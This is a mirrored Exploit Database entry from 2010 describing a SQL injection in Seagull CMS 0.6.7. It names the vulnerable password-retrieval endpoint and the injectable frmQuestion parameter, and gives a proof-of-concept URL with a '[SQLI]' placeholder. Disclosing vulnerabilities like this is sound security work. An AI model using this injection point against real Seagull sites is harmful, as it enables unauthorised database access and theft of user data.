Seagull 0.6.7 – SQL Injection

• Exploit Database
• 122 阅读

• 作者： Sweet
  日期： 2010-08-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14838/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  1######################################1 0 Sweet the Algerian Haxxor0 1######################################0 01 1[+]Exploit Title:seagull-0.6.7 SQLinjection Vulnerabilitie0 0[+]Date: 29/08/2010 1 1[+]Author: Sweet0 0[+]Contact : charif38@hotmail.fr0 1[+]Software Link: http://seagullproject.org/0 0[+]Download:1 1[+]Version: 0.6.7 and lesser0 0[+]Tested on: WinXp sp3 1 1[+]Risk : Hight 0 0[+]Description : just another CMS 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1     SQL injection :   in /seagnulPath/www/index.php/user/password with http request editor The POST variable frmQuestion has been set to 1'   POC:   http://server/index.php/user/password/?action=retrieve&frmEmail=111-222-1933email@address.tst&frmQuestion=1'[SQLI]&frmAnswer=111-222-1933email@address.tst&submitted=retrieve     screen shot:http://img163.imageshack.us/img163/3028/imagexp.jpg       thx to Milw0rm.com , JF - Hamst0r - Keystroke, inj3ct0r.com , exploit-db.com     Saha Ftourkoum et 1,2,3 viva L'Algerie :))